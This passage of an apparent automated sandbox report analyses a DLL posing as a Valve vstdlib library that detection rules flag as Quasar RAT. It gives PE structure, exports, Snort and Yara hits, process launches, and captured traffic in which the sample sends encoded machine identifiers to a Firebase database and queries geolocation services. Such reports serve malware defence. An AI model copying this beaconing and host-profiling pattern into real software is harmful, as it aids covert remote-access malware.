                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x7200680x28.sdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x71fd100x53.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7220000x33c.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x71ea000x2d68
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7240000x30.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x10.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20100x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x71dd720x71de004d64ab768b4471f4dad807114cfa4605unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .sdata0x7200000x1e30x200205f35db0c4d7d485e9c66117be0b622False0.587890625OpenPGP Public Key4.531194460208676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x7220000x33c0x4009e217ba6f8b9f646b6164e424d8a3a34False0.341796875data2.6099876523576393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x7240000x300x2004d5f1334246aa8d607d9db9127b03f3bFalse0.115234375data0.5919266160963527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0x7220580x2e4data0.4297297297297297

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorDllMain

                                  Exports

                                  NameOrdinalAddress
                                  V_FixDoubleSlashes00x180002122
                                  V_FixSlashes10x1800020d2
                                  V_IsAbsolutePath20x180002112
                                  V_RemoveDotSlashes30x180002102
                                  V_StripLastDir40x1800020c2
                                  V_StripTrailingSlash50x1800020b2
                                  V_UTF16ToUTF860x1800020a2
                                  V_UTF8ToUTF1670x180002092
                                  V_snprintf80x180002062
                                  V_strncat90x180002082
                                  V_strncat_length100x1800020f2
                                  V_strncpy110x1800020e2
                                  V_vsnwprintf120x180002072

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  07/15/24-21:07:19.513418TCP2814031ETPRO TROJAN W32/Quasar RAT Connectivity Check4973880192.168.2.488.198.193.213
                                  07/15/24-21:07:19.945864TCP2814030ETPRO TROJAN W32/Quasar RAT Connectivity Check 24973980192.168.2.43.33.130.190

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 15, 2024 21:18:47.281012058 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:47.281119108 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:47.281264067 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:47.345803976 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:47.345849037 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:47.844490051 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:47.844568014 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:47.856596947 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:47.856625080 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:47.856945038 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:47.910090923 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:47.945382118 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:47.988498926 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:48.048000097 CEST4973880192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:48.052800894 CEST804973888.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:48.053911924 CEST4973880192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:48.055237055 CEST4973880192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:48.069284916 CEST804973888.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:48.093142986 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:48.144471884 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:48.154690981 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:48.154717922 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:48.349183083 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:48.349277973 CEST4434973534.120.206.254192.168.2.4
                                  Jul 15, 2024 21:18:48.349335909 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:48.360985994 CEST49735443192.168.2.434.120.206.254
                                  Jul 15, 2024 21:18:48.736191988 CEST804973888.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:48.751128912 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:48.751224995 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:48.751318932 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:48.752296925 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:48.752334118 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:48.785089970 CEST4973880192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.421607018 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.421715021 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.423994064 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.424017906 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.424268007 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.426465034 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.468506098 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.707180023 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.707261086 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.707330942 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.717190981 CEST49740443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.717252970 CEST4434974088.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.717789888 CEST49743443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.717839956 CEST4434974388.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:49.717941046 CEST49743443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.718482018 CEST49743443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:49.718514919 CEST4434974388.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:50.391915083 CEST4434974388.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:50.409732103 CEST49743443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:50.409773111 CEST4434974388.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:50.684081078 CEST4434974388.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:50.684211016 CEST4434974388.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:50.684269905 CEST49743443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:50.684672117 CEST49743443192.168.2.488.198.193.213
                                  Jul 15, 2024 21:18:50.684695005 CEST4434974388.198.193.213192.168.2.4
                                  Jul 15, 2024 21:18:50.744736910 CEST4974580192.168.2.43.33.130.190
                                  Jul 15, 2024 21:18:50.749536991 CEST80497453.33.130.190192.168.2.4
                                  Jul 15, 2024 21:18:50.749629974 CEST4974580192.168.2.43.33.130.190
                                  Jul 15, 2024 21:18:50.749778032 CEST4974580192.168.2.43.33.130.190
                                  Jul 15, 2024 21:18:50.754641056 CEST80497453.33.130.190192.168.2.4
                                  Jul 15, 2024 21:18:52.127656937 CEST80497453.33.130.190192.168.2.4
                                  Jul 15, 2024 21:18:52.151479959 CEST4974780192.168.2.4104.26.12.205
                                  Jul 15, 2024 21:18:52.156303883 CEST8049747104.26.12.205192.168.2.4
                                  Jul 15, 2024 21:18:52.156373024 CEST4974780192.168.2.4104.26.12.205
                                  Jul 15, 2024 21:18:52.156512976 CEST4974780192.168.2.4104.26.12.205
                                  Jul 15, 2024 21:18:52.161288023 CEST8049747104.26.12.205192.168.2.4
                                  Jul 15, 2024 21:18:52.175719976 CEST4974580192.168.2.43.33.130.190
                                  Jul 15, 2024 21:18:52.622903109 CEST8049747104.26.12.205192.168.2.4
                                  Jul 15, 2024 21:18:52.675714970 CEST4974780192.168.2.4104.26.12.205
                                  Jul 15, 2024 21:20:03.742213964 CEST804973888.198.193.213192.168.2.4
                                  Jul 15, 2024 21:20:03.742356062 CEST4973880192.168.2.488.198.193.213
                                  Jul 15, 2024 21:20:07.128797054 CEST80497453.33.130.190192.168.2.4
                                  Jul 15, 2024 21:20:07.128879070 CEST4974580192.168.2.43.33.130.190
                                  Jul 15, 2024 21:20:28.369251013 CEST4973880192.168.2.488.198.193.213
                                  Jul 15, 2024 21:20:28.369288921 CEST4974580192.168.2.43.33.130.190
                                  Jul 15, 2024 21:20:28.369318962 CEST4974780192.168.2.4104.26.12.205
                                  Jul 15, 2024 21:20:28.374264956 CEST804973888.198.193.213192.168.2.4
                                  Jul 15, 2024 21:20:28.374324083 CEST80497453.33.130.190192.168.2.4
                                  Jul 15, 2024 21:20:28.374473095 CEST8049747104.26.12.205192.168.2.4
                                  Jul 15, 2024 21:20:28.377607107 CEST4974780192.168.2.4104.26.12.205

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 15, 2024 21:18:47.173902988 CEST5850453192.168.2.41.1.1.1
                                  Jul 15, 2024 21:18:47.195360899 CEST53585041.1.1.1192.168.2.4
                                  Jul 15, 2024 21:18:48.030344963 CEST5372453192.168.2.41.1.1.1
                                  Jul 15, 2024 21:18:48.043981075 CEST53537241.1.1.1192.168.2.4
                                  Jul 15, 2024 21:18:48.737186909 CEST5552753192.168.2.41.1.1.1
                                  Jul 15, 2024 21:18:48.750442982 CEST53555271.1.1.1192.168.2.4
                                  Jul 15, 2024 21:18:50.735013008 CEST6414453192.168.2.41.1.1.1
                                  Jul 15, 2024 21:18:50.744122028 CEST53641441.1.1.1192.168.2.4
                                  Jul 15, 2024 21:18:52.143435955 CEST5236453192.168.2.41.1.1.1
                                  Jul 15, 2024 21:18:52.150810957 CEST53523641.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 15, 2024 21:18:47.173902988 CEST192.168.2.41.1.1.10x6e3dStandard query (0)argentina-e4162-default-rtdb.firebaseio.comA (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:48.030344963 CEST192.168.2.41.1.1.10x4173Standard query (0)telize.comA (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:48.737186909 CEST192.168.2.41.1.1.10xabd9Standard query (0)www.telize.comA (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:50.735013008 CEST192.168.2.41.1.1.10x6261Standard query (0)freegeoip.netA (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:52.143435955 CEST192.168.2.41.1.1.10x54dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 15, 2024 21:18:47.195360899 CEST1.1.1.1192.168.2.40x6e3dNo error (0)argentina-e4162-default-rtdb.firebaseio.com34.120.206.254A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:47.195360899 CEST1.1.1.1192.168.2.40x6e3dNo error (0)argentina-e4162-default-rtdb.firebaseio.com35.190.39.113A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:47.195360899 CEST1.1.1.1192.168.2.40x6e3dNo error (0)argentina-e4162-default-rtdb.firebaseio.com34.120.160.131A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:47.195360899 CEST1.1.1.1192.168.2.40x6e3dNo error (0)argentina-e4162-default-rtdb.firebaseio.com35.201.97.85A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:48.043981075 CEST1.1.1.1192.168.2.40x4173No error (0)telize.com88.198.193.213A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:48.750442982 CEST1.1.1.1192.168.2.40xabd9No error (0)www.telize.com88.198.193.213A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:50.744122028 CEST1.1.1.1192.168.2.40x6261No error (0)freegeoip.net3.33.130.190A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:50.744122028 CEST1.1.1.1192.168.2.40x6261No error (0)freegeoip.net15.197.148.33A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:52.150810957 CEST1.1.1.1192.168.2.40x54dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:52.150810957 CEST1.1.1.1192.168.2.40x54dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                  Jul 15, 2024 21:18:52.150810957 CEST1.1.1.1192.168.2.40x54dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • argentina-e4162-default-rtdb.firebaseio.com
                                  • www.telize.com
                                  • telize.com
                                  • freegeoip.net
                                  • api.ipify.org

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44973888.198.193.213802840C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 15, 2024 21:18:48.055237055 CEST144OUTGET /geoip HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: telize.com
                                  Connection: Keep-Alive
                                  Jul 15, 2024 21:18:48.736191988 CEST403INHTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Mon, 15 Jul 2024 19:18:48 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: keep-alive
                                  Location: https://www.telize.com/geoip
                                  Strict-Transport-Security: max-age=63072000
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.4497453.33.130.190802840C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 15, 2024 21:18:50.749778032 CEST146OUTGET /xml/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: freegeoip.net
                                  Connection: Keep-Alive
                                  Jul 15, 2024 21:18:52.127656937 CEST259INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 15 Jul 2024 19:18:52 GMT
                                  Content-Type: text/html
                                  Content-Length: 114
                                  Connection: keep-alive
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.449747104.26.12.205802840C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 15, 2024 21:18:52.156512976 CEST142OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
                                  Jul 15, 2024 21:18:52.622903109 CEST227INHTTP/1.1 200 OK
                                  Date: Mon, 15 Jul 2024 19:18:52 GMT
                                  Content-Type: text/plain
                                  Content-Length: 11
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a3c19d27b8d4326-EWR
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44973534.120.206.2544432840C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-15 19:18:47 UTC192OUTPOST /user.json HTTP/1.1
                                  Content-Type: application/json; charset=utf-8
                                  Host: argentina-e4162-default-rtdb.firebaseio.com
                                  Content-Length: 76
                                  Expect: 100-continue
                                  Connection: Keep-Alive
                                  2024-07-15 19:18:48 UTC25INHTTP/1.1 100 Continue
                                  2024-07-15 19:18:48 UTC1OUTData Raw: 7b
                                  Data Ascii: {
                                  2024-07-15 19:18:48 UTC75OUTData Raw: 22 4d 41 51 55 49 4e 41 22 3a 22 4e 7a 59 77 4e 6a 4d 35 22 2c 22 44 41 54 41 22 3a 22 4d 54 55 75 4d 44 63 75 4d 6a 41 79 4e 43 41 78 4e 54 6f 78 4f 44 6f 30 4e 51 3d 3d 22 2c 22 50 4c 55 47 49 4e 22 3a 22 4d 41 3d 3d 22 7d
                                  Data Ascii: "MAQUINA":"NzYwNjM5","DATA":"MTUuMDcuMjAyNCAxNToxODo0NQ==","PLUGIN":"MA=="}
                                  2024-07-15 19:18:48 UTC318INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Mon, 15 Jul 2024 19:18:48 GMT
                                  Content-Type: application/json; charset=utf-8
                                  Content-Length: 31
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Cache-Control: no-cache
                                  Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                  {"name":"-O1rpJvS_Y5GLoZkQlTi"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.44974088.198.193.2134432840C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-15 19:18:49 UTC148OUTGET /geoip HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: www.telize.com
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.44974388.198.193.2134432840C:\Windows\System32\rundll32.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-15 19:18:50 UTC148OUTGET /geoip HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: www.telize.com
                                  Connection: Keep-Alive


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\loaddll64.exe
                                  Wow64 process (32bit):false
                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
                                  Imagebase:0x7ff6eccd0000
                                  File size:165'888 bytes
                                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                  Imagebase:0x7ff7699e0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1702356382.000002371EFB2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:15:18:32
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1729906045.0000013FFD192000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:15:18:35
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
